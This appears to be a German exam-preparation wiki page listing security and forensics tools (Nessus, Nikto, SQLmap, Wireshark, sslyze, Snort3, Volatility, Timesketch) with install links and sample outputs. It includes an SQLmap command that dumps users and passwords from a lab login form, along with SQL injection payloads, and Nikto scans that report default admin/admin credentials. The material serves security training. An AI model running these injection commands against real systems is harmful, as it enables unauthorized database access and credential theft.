Vorbereitung

Vorbereitung
Thomas Gossweiler
Thomas Gossweiler

Created: 03/24/2021 7:56 PM - Updated: 06/29/2021 11:23 PM

Prüfungsvorbereitung

Für die Prüfung werden diese Toos eingesetzt.


Phyton 3.x 


https://www.programiz.com/python-programming/list

 


Snore 2.x

reload=9&v=-GgqYq5-EBg

snort-installation-auf-pfsense

https://www.snort.org/ 

 


SQLite




sslyze

sslyze 

$ pip install --upgrade sslyze
$ python -m sslyze www.yahoo.com www.google.com "[2607:f8b0:400a:807::2004]:443"

$ python -m sslyze --regular www.google.com --json_out=results.json
$ python -m sslyze -h





Time Sketch




Volatility
https://github.com/volatilityfoundation/volatility/wiki 



Wireshark

 https://youtu.be/lb1Dw0elw0Q 




Display Filter Reference

1 2 3 4 6 9 A B C D E F G H I J K L M N O P Q R S T U V W X Y Z


A. Nessus Essentials (Community Edition)

========================================

Begrenzt auf 16 IP-Adressen

1. Installation

https://www.tenable.com/downloads/nessus?loginAttempted=true

- Windows

- OSX

- GNU/Linux



B. Web Application Security Scanner

===================================

1. Scanner

- Nikto

- SQLmap

2. SQLmap-Beispiel

$ cat requests.txt

POST /index.php HTTP/1.1

Host: 10.11.1.252:8000

User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://10.11.1.252:8000/login.php

Cookie: PHPSESSID=cbdnommft9ggiii89h0ia9caa0

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 39

username=admin*&password=b&submit=Log+In

$ sqlmap -r requests.txt --time-sec 10 --risk 3 --level 3 --technique BEUSTQ --threads 10 --dbms=mysql --users –passwords

[…]

(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y

sqlmap identified the following injection point(s) with a total of 246 HTTP(s) requests:

---

Parameter: #1* ((custom) POST)

    Type: boolean-based blind

    Title: OR boolean-based blind - WHERE or HAVING clause

    Payload: username=-2383' OR 7488=7488-- psJp&password=b&submit=Log In


    Type: AND/OR time-based blind

    Title: MySQL >= 5.0.12 AND time-based blind

    Payload: username=admin' AND SLEEP(10)-- VsjK&password=b&submit=Log In

---

[06:22:24] [INFO] the back-end DBMS is MySQL

web server operating system: Linux CentOS 5.10

web application technology: Apache 2.2.3, PHP 5.1.6

back-end DBMS: MySQL >= 5.0.12


3. Beispiel

$ nikto -useragent "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:59.0) Gecko/20100101 Firefox/59.0" -port 80 -host 10.11.1.39

- Nikto v2.1.6

---------------------------------------------------------------------------

+ Target IP:          10.11.1.39

+ Target Hostname:    10.11.1.39

+ Target Port:        80

+ Start Time:         2018-12-10 17:02:54 (GMT-5)

---------------------------------------------------------------------------

+ Server: nginx/1.6.3

+ Server leaks inodes via ETags, header found with file /, fields: 0x1321 0x5058a1e728280

+ The anti-clickjacking X-Frame-Options header is not present.

+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS

+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME typ

e

+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE

+ OSVDB-3268: /icons/: Directory indexing found.

+ OSVDB-3233: /icons/README: Apache default file found.

+ Retrieved x-powered-by header: OTRS 5.0.2 - Open Ticket Request System (http://www.otrs.com/)

+ Uncommon header 'content-disposition' found, with contents: filename="Installer.html"

+ 8346 requests: 0 error(s) and 9 item(s) reported on remote host

+ End Time:           2018-12-10 17:23:23 (GMT-5) (1229 seconds)


4. Beispiel

$ nikto -useragent "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:59.0) Gecko/20100101 Firefox/59.0" -port 8080 -host 192.168.68.67

- Nikto v2.1.6

---------------------------------------------------------------------------

+ Target IP:          192.168.68.67

+ Target Hostname:    192.168.68.67

+ Target Port:        8080

+ Start Time:         2019-03-01 04:46:31 (GMT-5)

---------------------------------------------------------------------------

+ Server: Apache/2.4.17 (Win32) OpenSSL/1.0.2d PHP/5.5.30

+ The anti-clickjacking X-Frame-Options header is not present.

+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS

+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type

+ / - Requires Authentication for realm 'My restricted Area'

+ Default account found for 'My restricted Area' at / (ID 'admin', PW 'admin'). Generic account discovered..

+ Root page / redirects to: http://192.168.68.67/dashboard/

+ Retrieved x-powered-by header: PHP/5.5.30

+ PHP/5.5.30 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.

+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var

+ Server leaks inodes via ETags, header found with file /favicon.ico, fields: 0x78ae 0x51affc7a4c400

+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST

+ Cookie PHPSESSID created without the httponly flag

+ Cookie PHPSESSIDCV created without the httponly flag

+ Cookie javascript_enabled_detect created without the httponly flag

+ /tiki/tiki-install.php: Tiki 1.7.2 and previous allowed restricted Wiki pages to be viewed via a 'URL trick'. Default login/pass could be admin/admin

+ OSVDB-3268: /img/: Directory indexing found.

+ OSVDB-3092: /img/: This might be interesting...

+ OSVDB-3268: /icons/: Directory indexing found.

+ OSVDB-3233: /icons/README: Apache default file found.

+ 8373 requests: 0 error(s) and 17 item(s) reported on remote host

+ End Time:           2019-03-01 05:05:17 (GMT-5) (1126 seconds)

---------------------------------------------------------------------------

+ 1 host(s) tested

5. Beispiel

$ nikto -useragent "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:59.0) Gecko/20100101 Firefox/59.0" -port 80 -host 10.11.1.10

- Nikto v2.1.6

---------------------------------------------------------------------------

+ Target IP:          10.11.1.10

+ Target Hostname:    10.11.1.10

+ Target Port:        80

+ Start Time:         2018-11-14 16:26:27 (GMT-5)

---------------------------------------------------------------------------

+ Server: Microsoft-IIS/6.0

+ The anti-clickjacking X-Frame-Options header is not present.

+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS

+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type

+ No CGI Directories found (use '-C all' to force check all possible dirs)

+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST

+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST

+ Uncommon header 'server-error' found, with contents: true

+ Cookie CFID created without the httponly flag

+ Cookie CFTOKEN created without the httponly flag

+ Cookie CFAUTHORIZATION_cfadmin created without the httponly flag

+ OSVDB-3399: /CFIDE/administrator/index.cfm: ColdFusion Administrator for ColdFusion 4.5.1 and earlier may have an overflow DoS by modifying the login page and submit 40k character passwords. This page should not be accessible to all users. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0538. ALLAIRE:ASB00-14. http://www.securityfocus.com/bid/1314.

+ Cookie CFAUTHORIZATION_componentutils created without the httponly flag

+ /CFIDE/componentutils/cfcexplorer.cfc: ColdFusion Component Browser. Default password may be 'admin'.

+ Cookie JSESSIONID created without the httponly flag

+ /flex2gateway/http: Adobe BlazeDS identified.

+ 7517 requests: 0 error(s) and 14 item(s) reported on remote host

+ End Time:           2018-11-14 16:43:04 (GMT-5) (997 seconds)

---------------------------------------------------------------------------

+ 1 host(s) tested



C.  Wireshark

=============

Open Source

2. Installation

 https://www.wireshark.org/download.html

 - Windows

 - OSX

 - GNU/Linux

2. Beispieldaten

https://www.chappell-university.com/wireshark101-2ndedition

http://d3qsv2czxjcdqb.cloudfront.net/WS101_EssentialSkills_v2/wireshark101v2files.zip

3. Benutzerhandbuch

https://www.wireshark.org/download/docs/user-guide.pdf

4. Weiterführende Literatur

https://www.amazon.de/Wireshark-101-Essential-Analysis-Solution/dp/1893939758/ref=sr_1_2



C. SSLyze

=========

Open Source

1. Installation

https://github.com/nabla-c0d3/sslyze/releases

- Windows

- OSX

- GNU/Linux

2. Informationen zu einzelnen Cipher Suites

https://ciphersuite.info

3. TLS Best Practices

https://github.com/ssllabs/research/wiki/SSL-and-TLS-Deployment-Best-Practices

4. Beispiele mangelhafter Zertifikate

https://badssl.com

5. Beispiel

Zustätzliche Optionen:

--starttls=rdp

--starttls=ldap

--starttls=ftp

--starttls=imap

--starttls=smtp

--starttls=pop3

$ sslyze --regular www.ubs.com:443

 CHECKING HOST(S) AVAILABILITY

 -----------------------------

   www.ubs.com:443                       => 2.16.13.151


 SCAN RESULTS FOR WWW.UBS.COM:443 - 2.16.13.151

 ----------------------------------------------

 * TLS 1.2 Session Resumption Support:

      With Session IDs: OK - Supported (5 successful resumptions out of 5 attempts).

      With TLS Tickets: OK - Supported.

 * Elliptic Curve Key Exchange:

       Supported curves:                  X25519, prime256v1

       Rejected curves:                   X448, prime192v1, secp160k1, secp160r1, secp160r2, secp192k1, secp224k1, secp224r1, secp256k1, secp384r1, secp521r1, sect163k1, sect163r1, sect163r2, sect193r1, sect193r2, sect233k1, sect233r1, sect239k1, sect283k1, sect283r1, sect409k1, sect409r1, sect571k1, sect571r1

 * Certificates Information:

       Hostname sent for SNI:             www.ubs.com

       Number of certificates detected:   1

     Certificate #0 ( _RSAPublicKey )

       SHA1 Fingerprint:                  9420d191709805dd2579268da523c62f1770436d

       Common Name:                       www.ubs.com

       Issuer:                            DigiCert SHA2 Extended Validation Server CA

       Serial Number:                     2046900138870622124013464740506035175

       Not Before:                        2019-10-28

       Not After:                         2021-12-08

       Public Key Algorithm:              _RSAPublicKey

       Signature Algorithm:               sha256

       Key Size:                          2048

       Exponent:                          65537

       DNS Subject Alternative Names:     ['www.ubs.com', 'm.ubs.com']

     

Certificate #0 - Trust

       Hostname Validation:               OK - Certificate matches server hostname

       Android CA Store (9.0.0_r9):       OK - Certificate is trusted

       Apple CA Store (iOS 14, iPadOS 14, macOS 11, watchOS 7, and tvOS 14):OK - Certificate is trusted

       Java CA Store (jdk-13.0.2):        OK - Certificate is trusted

       Mozilla CA Store (2021-01-24):     OK - Certificate is trusted, Extended Validation

       Windows CA Store (2021-02-08):     OK - Certificate is trusted

       Symantec 2018 Deprecation:         OK - Not a Symantec-issued certificate

       Received Chain:                    www.ubs.com --> DigiCert SHA2 Extended Validation Server CA --> DigiCert High Assurance EV Root CA

       Verified Chain:                    www.ubs.com --> DigiCert SHA2 Extended Validation Server CA --> DigiCert High Assurance EV Root CA

       Received Chain Contains Anchor:    WARNING - Received certificate chain contains the anchor certificate

       Received Chain Order:              OK - Order is valid

       Verified Chain contains SHA1:      OK - No SHA1-signed certificate in the verified certificate chain


     Certificate #0 - Extensions

       OCSP Must-Staple:                  NOT SUPPORTED - Extension not found

       Certificate Transparency:          OK - 3 SCTs included


     Certificate #0 - OCSP Stapling

       OCSP Response Status:              SUCCESSFUL

       Validation w/ Mozilla Store:       OK - Response is trusted

       Responder Key Hash:                b'=\xd3P\xa5\xd6\xa0\xad\xee\xf3J`\ne\xd3!\xd4\xf8\xf8\xd6\x0f'

       Cert Status:                       GOOD

       Cert Serial Number:                2046900138870622124013464740506035175

       This Update:                       2021-06-20

       Next Update:                       2021-06-27


 * TLS 1.1 Cipher Suites:

     Attempted to connect using 80 cipher suites; the server rejected all cipher suites.


 * OpenSSL CCS Injection:

                                          OK - Not vulnerable to OpenSSL CCS injection

 * Deflate Compression:

                                          OK - Compression disabled

 * OpenSSL Heartbleed:

                                          OK - Not vulnerable to Heartbleed

 * Session Renegotiation:

       Client Renegotiation DoS Attack:   VULNERABLE - Server honors client-initiated renegotiations

       Secure Renegotiation:              OK - Supported

 * TLS 1.0 Cipher Suites:

     Attempted to connect using 80 cipher suites; the server rejected all cipher suites.


 * Downgrade Attacks:

       TLS_FALLBACK_SCSV:                 OK - Supported

 * TLS 1.3 Cipher Suites:

     Attempted to connect using 5 cipher suites.


     The server accepted the following 5 cipher suites:

        TLS_CHACHA20_POLY1305_SHA256                      256       ECDH: X25519 (253 bits)

        TLS_AES_256_GCM_SHA384                            256       ECDH: X25519 (253 bits)

        TLS_AES_128_GCM_SHA256                            128       ECDH: X25519 (253 bits)

        TLS_AES_128_CCM_SHA256                            128       ECDH: X25519 (253 bits)

        TLS_AES_128_CCM_8_SHA256                          128       ECDH: X25519 (253 bits)


 * SSL 3.0 Cipher Suites:

     Attempted to connect using 80 cipher suites; the server rejected all cipher suites.

 * TLS 1.2 Cipher Suites:

     Attempted to connect using 156 cipher suites.


     The server accepted the following 7 cipher suites:

        TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256       256       ECDH: prime256v1 (256 bits)

        TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384             256       ECDH: prime256v1 (256 bits)

        TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384             256       ECDH: prime256v1 (256 bits)

        TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA                256       ECDH: prime256v1 (256 bits)

        TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256             128       ECDH: prime256v1 (256 bits)

        TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256             128       ECDH: prime256v1 (256 bits)

        TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA                128       ECDH: prime256v1 (256 bits)

     The group of cipher suites supported by the server has the following properties:

       Forward Secrecy                    OK - Supported

       Legacy RC4 Algorithm               OK - Not Supported


 * SSL 2.0 Cipher Suites:

     Attempted to connect using 7 cipher suites; the server rejected all cipher suites.

 * ROBOT Attack:

                                          OK - Not vulnerable, RSA cipher suites not supported.

 SCAN COMPLETED IN 1.34 S

 ------------------------


6. Beispiel

$ /usr/bin/sslyze --regular 10.10.10.228:443

 CHECKING HOST(S) AVAILABILITY

 -----------------------------

   10.10.10.228:443                       => 10.10.10.228


 SCAN RESULTS FOR 10.10.10.228:443 - 10.10.10.228

 ------------------------------------------------

 * Deflate Compression:

                                          OK - Compression disabled

 * TLS 1.2 Cipher Suites:

     Attempted to connect using 156 cipher suites.


     The server accepted the following 46 cipher suites:

        TLS_RSA_WITH_SEED_CBC_SHA                         128

        TLS_RSA_WITH_CAMELLIA_256_CBC_SHA256              256

        TLS_RSA_WITH_CAMELLIA_256_CBC_SHA                 256

        TLS_RSA_WITH_CAMELLIA_128_CBC_SHA256              128

        TLS_RSA_WITH_CAMELLIA_128_CBC_SHA                 128

        TLS_RSA_WITH_ARIA_256_GCM_SHA384                  256

        TLS_RSA_WITH_ARIA_128_GCM_SHA256                  128

        TLS_RSA_WITH_AES_256_GCM_SHA384                   256

        TLS_RSA_WITH_AES_256_CCM_8                        128

        TLS_RSA_WITH_AES_256_CCM                          256

        TLS_RSA_WITH_AES_256_CBC_SHA256                   256

        TLS_RSA_WITH_AES_256_CBC_SHA                      256

        TLS_RSA_WITH_AES_128_GCM_SHA256                   128

        TLS_RSA_WITH_AES_128_CCM_8                        128

        TLS_RSA_WITH_AES_128_CCM                          128

        TLS_RSA_WITH_AES_128_CBC_SHA256                   128

        TLS_RSA_WITH_AES_128_CBC_SHA                      128

        TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256       256       ECDH: X25519 (253 bits)

        TLS_ECDHE_RSA_WITH_CAMELLIA_256_CBC_SHA384        256       ECDH: X25519 (253 bits)

        TLS_ECDHE_RSA_WITH_CAMELLIA_128_CBC_SHA256        128       ECDH: X25519 (253 bits)

        TLS_ECDHE_RSA_WITH_ARIA_256_GCM_SHA384            256       ECDH: X25519 (253 bits)

        TLS_ECDHE_RSA_WITH_ARIA_128_GCM_SHA256            128       ECDH: X25519 (253 bits)

        TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384             256       ECDH: prime256v1 (256 bits)

        TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384             256       ECDH: prime256v1 (256 bits)

        TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA                256       ECDH: prime256v1 (256 bits)

        TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256             128       ECDH: prime256v1 (256 bits)

        TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256             128       ECDH: prime256v1 (256 bits)

        TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA                128       ECDH: prime256v1 (256 bits)

        TLS_DHE_RSA_WITH_SEED_CBC_SHA                     128       DH (1024 bits)

        TLS_DHE_RSA_WITH_CHACHA20_POLY1305_SHA256         256       DH (1024 bits)

        TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA256          256       DH (1024 bits)

        TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA             256       DH (1024 bits)

        TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA256          128       DH (1024 bits)

        TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA             128       DH (1024 bits)

        TLS_DHE_RSA_WITH_ARIA_256_GCM_SHA384              256       DH (1024 bits)

        TLS_DHE_RSA_WITH_ARIA_128_GCM_SHA256              256       DH (1024 bits)

        TLS_DHE_RSA_WITH_AES_256_GCM_SHA384               256       DH (1024 bits)

        TLS_DHE_RSA_WITH_AES_256_CCM_8                    256       DH (1024 bits)

        TLS_DHE_RSA_WITH_AES_256_CCM                      256       DH (1024 bits)

        TLS_DHE_RSA_WITH_AES_256_CBC_SHA256               256       DH (1024 bits)

        TLS_DHE_RSA_WITH_AES_256_CBC_SHA                  256       DH (1024 bits)

        TLS_DHE_RSA_WITH_AES_128_GCM_SHA256               128       DH (1024 bits)

        TLS_DHE_RSA_WITH_AES_128_CCM_8                    128       DH (1024 bits)

        TLS_DHE_RSA_WITH_AES_128_CCM                      128       DH (1024 bits)

        TLS_DHE_RSA_WITH_AES_128_CBC_SHA256               128       DH (1024 bits)

        TLS_DHE_RSA_WITH_AES_128_CBC_SHA                  128       DH (1024 bits)


     The group of cipher suites supported by the server has the following properties:

       Forward Secrecy                    OK - Supported

       Legacy RC4 Algorithm               OK - Not Supported


 * Certificates Information:

       Hostname sent for SNI:             10.10.10.228

       Number of certificates detected:   1


     Certificate #0 ( _RSAPublicKey )

       SHA1 Fingerprint:                  b0238c547a905bfa119c4e8baccaeacf36491ff6

       Common Name:                       localhost

       Issuer:                            localhost

       Serial Number:                     13098529066745705731

       Not Before:                        2009-11-10

       Not After:                         2019-11-08

       Public Key Algorithm:              _RSAPublicKey

       Signature Algorithm:               sha1

       Key Size:                          1024

       Exponent:                          65537

       DNS Subject Alternative Names:     []


     Certificate #0 - Trust

       Hostname Validation:               FAILED - Certificate does NOT match server hostname

       Android CA Store (9.0.0_r9):       FAILED - Certificate is NOT Trusted: self signed certificate

       Apple CA Store (iOS 14, iPadOS 14, macOS 11, watchOS 7, and tvOS 14):FAILED - Certificate is NOT Trusted: self signed certificate

       Java CA Store (jdk-13.0.2):        FAILED - Certificate is NOT Trusted: self signed certificate

       Mozilla CA Store (2021-01-24):     FAILED - Certificate is NOT Trusted: self signed certificate

       Windows CA Store (2021-02-08):     FAILED - Certificate is NOT Trusted: self signed certificate

       Symantec 2018 Deprecation:         ERROR - Could not build verified chain (certificate untrusted?)

       Received Chain:                    localhost

       Verified Chain:                    ERROR - Could not build verified chain (certificate untrusted?)

       Received Chain Contains Anchor:    ERROR - Could not build verified chain (certificate untrusted?)

       Received Chain Order:              OK - Order is valid

       Verified Chain contains SHA1:      ERROR - Could not build verified chain (certificate untrusted?)


     Certificate #0 - Extensions

       OCSP Must-Staple:                  NOT SUPPORTED - Extension not found

       Certificate Transparency:          NOT SUPPORTED - Extension not found


     Certificate #0 - OCSP Stapling

                                          NOT SUPPORTED - Server did not send back an OCSP response


 * TLS 1.2 Session Resumption Support:

      With Session IDs: OK - Supported (5 successful resumptions out of 5 attempts).

      With TLS Tickets: OK - Supported.


 * OpenSSL CCS Injection:

                                          OK - Not vulnerable to OpenSSL CCS injection

 * ROBOT Attack:

                                          OK - Not vulnerable.


 * TLS 1.1 Cipher Suites:

     Attempted to connect using 80 cipher suites.


     The server accepted the following 13 cipher suites:

        TLS_RSA_WITH_SEED_CBC_SHA                         128

        TLS_RSA_WITH_IDEA_CBC_SHA                         128

        TLS_RSA_WITH_CAMELLIA_256_CBC_SHA                 256

        TLS_RSA_WITH_CAMELLIA_128_CBC_SHA                 128

        TLS_RSA_WITH_AES_256_CBC_SHA                      256

        TLS_RSA_WITH_AES_128_CBC_SHA                      128

        TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA                256       ECDH: prime256v1 (256 bits)

        TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA                128       ECDH: prime256v1 (256 bits)

        TLS_DHE_RSA_WITH_SEED_CBC_SHA                     128       DH (1024 bits)

        TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA             256       DH (1024 bits)

        TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA             128       DH (1024 bits)

        TLS_DHE_RSA_WITH_AES_256_CBC_SHA                  256       DH (1024 bits)

        TLS_DHE_RSA_WITH_AES_128_CBC_SHA                  128       DH (1024 bits)


     The group of cipher suites supported by the server has the following properties:

       Forward Secrecy                    OK - Supported

       Legacy RC4 Algorithm               OK - Not Supported


 * TLS 1.3 Cipher Suites:

     Attempted to connect using 5 cipher suites.


     The server accepted the following 3 cipher suites:

        TLS_CHACHA20_POLY1305_SHA256                      256       ECDH: X25519 (253 bits)

        TLS_AES_256_GCM_SHA384                            256       ECDH: X25519 (253 bits)

        TLS_AES_128_GCM_SHA256                            128       ECDH: X25519 (253 bits)


 * Session Renegotiation:

       Client Renegotiation DoS Attack:   OK - Not vulnerable

       Secure Renegotiation:              OK - Supported


 * Downgrade Attacks:

       TLS_FALLBACK_SCSV:                 OK - Supported


 * Elliptic Curve Key Exchange:

       Supported curves:                  X25519, X448, prime256v1, secp384r1, secp521r1

       Rejected curves:                   prime192v1, secp160k1, secp160r1, secp160r2, secp192k1, secp224k1, secp224r1, secp256k1, sect163k1, sect163r1, sect163r2, sect193r1, sect193r2, sect233k1, sect233r1, sect239k1, sect283k1, sect283r1, sect409k1, sect409r1, sect571k1, sect571r1


 * SSL 2.0 Cipher Suites:

     Attempted to connect using 7 cipher suites; the server rejected all cipher suites.


 * TLS 1.0 Cipher Suites:

     Attempted to connect using 80 cipher suites.


     The server accepted the following 13 cipher suites:

        TLS_RSA_WITH_SEED_CBC_SHA                         128

        TLS_RSA_WITH_IDEA_CBC_SHA                         128

        TLS_RSA_WITH_CAMELLIA_256_CBC_SHA                 256

        TLS_RSA_WITH_CAMELLIA_128_CBC_SHA                 128

        TLS_RSA_WITH_AES_256_CBC_SHA                      256

        TLS_RSA_WITH_AES_128_CBC_SHA                      128

        TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA                256       ECDH: prime256v1 (256 bits)

        TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA                128       ECDH: prime256v1 (256 bits)

        TLS_DHE_RSA_WITH_SEED_CBC_SHA                     128       DH (1024 bits)

        TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA             256       DH (1024 bits)

        TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA             128       DH (1024 bits)

        TLS_DHE_RSA_WITH_AES_256_CBC_SHA                  256       DH (1024 bits)

        TLS_DHE_RSA_WITH_AES_128_CBC_SHA                  128       DH (1024 bits)


     The group of cipher suites supported by the server has the following properties:

       Forward Secrecy                    OK - Supported

       Legacy RC4 Algorithm               OK - Not Supported


 * SSL 3.0 Cipher Suites:

     Attempted to connect using 80 cipher suites; the server rejected all cipher suites.


 * OpenSSL Heartbleed:

                                          OK - Not vulnerable to Heartbleed


 SCAN COMPLETED IN 8.83 S

 ------------------------


D. SQLite

=========


1. Installation

- GNU/Linux, OSX: sqlite3

- Windows: https://sqlitebrowser.org


2. Cheat Sheet

https://www.sans.org/security-resources/posters/sqlite-pocket-reference-guide/380/download



E. TimeSketch

=============

Open Source

1. Installation

https://github.com/google/timesketch

cd /opt/timesketch

sudo docker-compose up -d

2. Testdata

https://dfir.blog/solving-magnet-forensics-ctf-with-plaso-timesketch-colab/

https://drive.google.com/drive/folders/1E0lELj9NouMwSMGZCI7lXWRqYE2uQCpW


F. Snort3

=========

1. Installation

https://hub.docker.com/r/ciscotalos/snort3

1.a. Initiales Setup

Das Argument -v mapped den lokalen Ordner /tmp/wireshark101v2files in den Docker-Container, sodass dieser auch dort über den Pfad /tmp/wireshark101v2files erreichbar ist.

sudo docker run --name snort3 -h snort3 -u snorty -w /home/snorty -d -v /tmp/wireshark101v2files:/tmp/wireshark101v2files -it ciscotalos/snort3 bash

1.b. Öffnen des Docker-Containers

sudo docker exec -it snort3 bash

2.c. Ausführen von Snort

Snort wendet alle Regeln, welche sich im Ordner ~/snort3/etc/rules/ befinden, auf alle PCAPNG-Dateien aus, welche im Ordner /tmp/wireshark101v2files gespeichert sind.

snort -q --rule-path ~/snort3/etc/rules/ --pcap-filter "*.pcapng" --pcap-dir=/tmp/wireshark101v2files --talos

Soll nur eine einzelne PCAP-Datei analysiert werden, so kann der folgende befehl verwendet werden:

snort -q --rule-path ~/snort3/etc/rules/ --pcap-filter "*.pcapng" -r /tmp/wireshark101v2files/ethernalblue.pcapng --talos


2. Introduction Videos

https://www.snort.org/resources


G. Volatility

=============

1. Installation

https://www.volatilityfoundation.org/releases

- Windows

- OSX

- GNU/Linux

2. Cheatsheet

https://downloads.volatilityfoundation.org/releases/2.4/CheatSheet_v2.4.pdf

3. Beispieldaten

  https://github.com/volatilityfoundation/volatility/wiki/Memory-Samples

4. Quiz

https://downloads.artofmemoryforensics.com//QuestionsCombined.txt

https://www.memoryanalysis.net/#!amf/cmg5


H. Python3

1. Installation

https://www.jetbrains.com/de-de/pycharm/

- Windows

- OSX

- GNU/Linux


Was this article helpful?

0 Out of 0 Marked As Helpfull

Have more questions? Please Contact Us